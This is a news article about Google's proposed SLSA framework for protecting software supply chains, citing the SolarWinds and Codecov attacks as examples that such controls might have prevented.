Google has proposed a new framework to mitigate the growing risks posed by attacks on the software supply chain.
The Supply Chain Levels for Software Artifacts (SLSA, pronounced “salsa”) is designed to ensure the integrity of software artifacts across the entire supply chain.
It’s based on Google’s own Binary Authorization for Borg framework, which the tech giant has been using as standard for all its production workloads for over eight years.
“The goal of SLSA is to improve the state of the industry, particularly open source, to defend against the most pressing integrity threats,” Google explained. “With SLSA, consumers can make informed choices about the security posture of the software they consume.”
A typical software supply chain features multiple weak points and dependencies where attackers could strike — from the source repository and control platforms to the build and package phases.
The SolarWinds attackers that managed to compromise nine US government agencies compromised the build platform and installed an implant that injected malicious behavior during each build, for example.
In another recent supply chain attack affecting US firm Codecov, attackers used leaked credentials to upload a malicious artifact that was not built by the company’s CI/CD system. Users unwittingly downloaded this directly from its Google Cloud Storage bucket.
SLSA would have helped prevent both by requiring more robust security controls for the SolarWinds build platform and flagging the malicious artifact to Codecov, Google claimed.
It described SLSA as a “set of incrementally adoptable security guidelines” with four levels designed to go beyond best practice approaches.
“It will support the automatic creation of auditable metadata that can be fed into policy engines to give ‘SLSA certification’ to a particular package or build platform. SLSA is designed to be incremental and actionable, and to provide security benefits at every step,” Google explained.
“Once an artifact qualifies at the highest level, consumers can have confidence that it has not been tampered with and can be securely traced back to source — something that is difficult, if not impossible, to do with most software today.”